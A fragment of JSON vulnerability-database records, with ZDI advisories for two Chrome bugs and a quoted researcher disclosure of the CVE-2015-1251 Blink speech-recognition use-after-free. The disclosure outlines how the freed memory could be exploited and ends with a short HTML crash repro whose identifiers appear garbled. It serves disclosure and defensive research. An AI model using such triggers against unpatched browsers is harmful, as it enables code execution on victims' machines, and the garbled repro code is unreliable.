"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1251"], "modified": "2015-05-19T00:00:00", "id": "ZDI-15-236", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-236/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-31T21:14:38", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of communication between the GPU process and the renderer processes. The issue lies in the verification of values from the renderer without copying them out of a shared memory section. An attacker can leverage this vulnerability to execute code under the context of the current process.", "cvss3": {}, "published": "2015-04-15T00:00:00", "type": "zdi", "title": "(Pwn2Own) Google Chrome pnacl Shared Memory Time-Of-Check/Time-Of-Use Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1234"], "modified": "2015-04-15T00:00:00", "id": "ZDI-15-137", "href": "https://www.zerodayinitiative.com/advisories/ZDI-15-137/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:21:26", "description": "", "cvss3": {}, "published": "2016-11-23T00:00:00", "type": "packetstorm", "title": "Chrome Blink SpeechRecognitionController Use-After-Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1251"], "modified": "2016-11-23T00:00:00", "id": "PACKETSTORM:139874", "href": "https://packetstormsecurity.com/files/139874/Chrome-Blink-SpeechRecognitionController-Use-After-Free.html", "sourceData": "`Throughout November, I plan to release details on vulnerabilities I \nfound in web-browsers which I've not released before. This is the \nseventeenth entry in that series. Unfortunately I won't be able to \npublish everything within one month at the current rate, so I may \ncontinue to publish these through December and January. \n \nThe below information is available in more detail on my blog at \nhttp://blog.skylined.nl/20161123001.html. There you can find a repro \nthat triggered this issue, snippets from the vulnerable source and more \ndetails in addition to the information below. \n \nFollow me on http://twitter.com/berendjanwever for daily browser bugs. \n \nChrome blink SpeechRecognitionController use-after-free \n======================================================= \n(Chromium 455857, CVE-2015-1251) \n \nSynopsis \n-------- \nA specially crafted web-page can cause the blink rendering engine used \nby Google Chrome and Chromium to continue to use a speech recognition \nAPI object after the memory block that contained the object has been \nfreed. An attacker can force the code to read a pointer from the freed \nmemory and use this to call a function, allowing arbitrary code execution. \n \nKnown affected software and attack vectors \n------------------------------------------ \n+ Google Chrome 39.0 \n \nAn attacker would need to get a target user to open a specially \ncrafted webpage. Disabling Javascript should prevent an attacker from \ntriggering the vulnerable code path. \n \nDescription \n----------- \nCreating a `webkitSpeechRecognition` Javascript object in a popup window \nbefore closing the popup frees a C++ object used internally by the \nspeech recognition API code but leaves a dangling pointer to the freed \nmemory in another C++ object. When the `start()` Javascript method is \ncalled, this dangling pointer is used to try to read a function pointer \nfrom a virtual function table and call that function. An attacker has \nample time to groom the heap between the free and re-use in order to \ncontrol the function pointer used by the code, allowing arbitrary code \nexecution. \n \nExploit \n------- \nAn attacker looking to exploit this issue is going to want to try and \ncontrol the contents of the freed memory, before getting the code to use \nthe dangling pointer to call a virtual function. Doing so would allow an \nattacker to execute arbitrary code. This is made possible because steps \n5 and 6 can both be triggered at a time of the attackers choosing, \ngiving the attacker the ability to free the memory in step 5 whenever \nthis is convenient and attempt to reallocate and fill it with any data \nbefore executing step 6. This should allow an attacker to create a fake \n`vftable` pointer and gain arbitrary code execution. In order to develop \na working exploit, existing mitigations will need to be bypassed, most \nsignificantly ASLR and DEP. As this vulnerability by itself does not \nappear to allow bypassing these mitigations, I did not develop a working \nexploit for it. \n \nTime-line \n--------- \n* November 2014: This vulnerability was found through fuzzing. \n* December 2014: This vulnerability was submitted to ZDI and iDefense. \n* January 2015: This vulnerability was acquired by ZDI. \n* February 2015: This vulnerability was fixed in revision 190993. \n* May 2015: This vulnerability was addressed by Google in \nChrome 43.0.2357.65. \n* November 2016: Details of this issue are released. \n \nCheers, \n \nSkyLined \n \n \nRepro.html \n \n<html> \n<head> \n<script> \noAWindow = window.open(); \noAWebkitASpeechARecognition = new oAWindow.webkitASpeechARecognition(); \noAWindow.close(); \nsetAInterval(function(){ \nif (oAWindow.closed) { \noAWebkitASpeechARecognition.start(); \n} \n}, 10); \n</script> \n</head> \n</html> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139874/chromeblink-uaf.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}